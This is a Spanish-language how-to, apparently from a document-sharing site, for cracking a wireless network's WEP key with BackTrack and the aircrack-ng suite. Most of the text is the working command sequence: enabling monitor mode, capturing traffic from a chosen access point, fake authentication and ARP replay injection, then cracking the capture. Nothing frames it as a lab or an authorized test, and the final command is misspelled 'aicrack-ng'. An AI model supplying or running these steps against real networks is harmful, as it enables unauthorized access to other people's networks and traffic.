Vous êtes sur la page 1sur 6

Crackear claves wep

Descargar BackTrack http://www.backtrack-linux.org/downloads/


versin GNOME) y quemarlo en un DVD

(En lo particular prefiero la

Insertamos el DVD y arrancamos nuestra pc desde la unidad de CD/DVD


Nos aparecer de la siguiente manera (En la versin BackTrack5 GNOME-32 aunque no varia en
las otras) y seleccionamos BackTrack Debug Safe Mode, esto para evitar algunos problemas.

Despues escribimos el comando startx

Esto iniciara la interface grafica.

Termin

Bueno comencemos.
Lo primero es saber el nombre de nuestra interface (tarjeta wireless) para ponerla en modo
monitor, asi que abrimos una terminal dando clic en el icono negro (Imagen anterior)
Escribimos el comando airmon-ng

Ya que conocemos nuestra interface la ponemos en modo monitor airmon-ng start


Nombre_de_nuestra_ interface en este caso es wlan0 (variar dependiendo del fabricante de su
tarjeta) as que quedara: airmon-ng start wlan0

Ya tenemos nuestra interface en modo monitor (monitor mode enabled on mon0)


Para verificar que esto es cierto podemos escribir el comando airmon-ng y nos apaecera de la
siguiente manera
Interface

Chipset

Driver

wlan0

Broadcom

b43 [phy0]

mon0

Broadcom

b43 [phy0]

mon0 es la interface en modo monitor.


Vamos a escanear las redes disponibles con el comando airodump-ng interface_modo_monitor
Quedara asi airodump-ng mon0 y comenzara a mostarnos las redes disponibles.

Detenemos el escaneo Ctrl+C


Escogemosuna red y anotamos los siguientes dato el BSSID y CH (canal del punto de acceso)
Siguiente comando airodump-ng -w redes -c 4 --bssid 00:1F:B3:85:89:D1 mon0

Donde
-w
-c

especifica que se va a guardar un archivo


canal del punto de acceso

--bssid

mac del punto de acceso

mon0

interface en modo monitor

Nos aparecer algo asi

Abrimos una segunda terminal y escribimos el sig. Comando aireplay-ng -1 0 -a


00:1F:B3:85:89:D1 mon0

Abrimos una tercera terminal y el siguiente comando aireplay-ng -3 -b mac_punto_de_acceso


interface
Quedara asi:
aireplay-ng -3 -b 00:1F:B3:85:89:D1 mon0
con el cual enviaremos y recibiremos paquetes
Vamos a la primera terminal y en la columna #Data se incrementara rpidamente, esperamos a
que llegue a los 30,000 datos para poder descifrar la clave. Cuando tengamos los suficientes
datos presionamos Ctrl+C en la tercera y primera terminal para detener el envio y captura de
datos.

Abrimos una cuarta terminal y escribimos el comando dir esto nos mostrara los archivos que se
guardaron
Nos aparecen varios archivos, el que nos interesa es el que tiene la extensin .cap escribimos el
comando
aicrack-ng redes-01.cap y descifrara la clave.

Vous aimerez peut-être aussi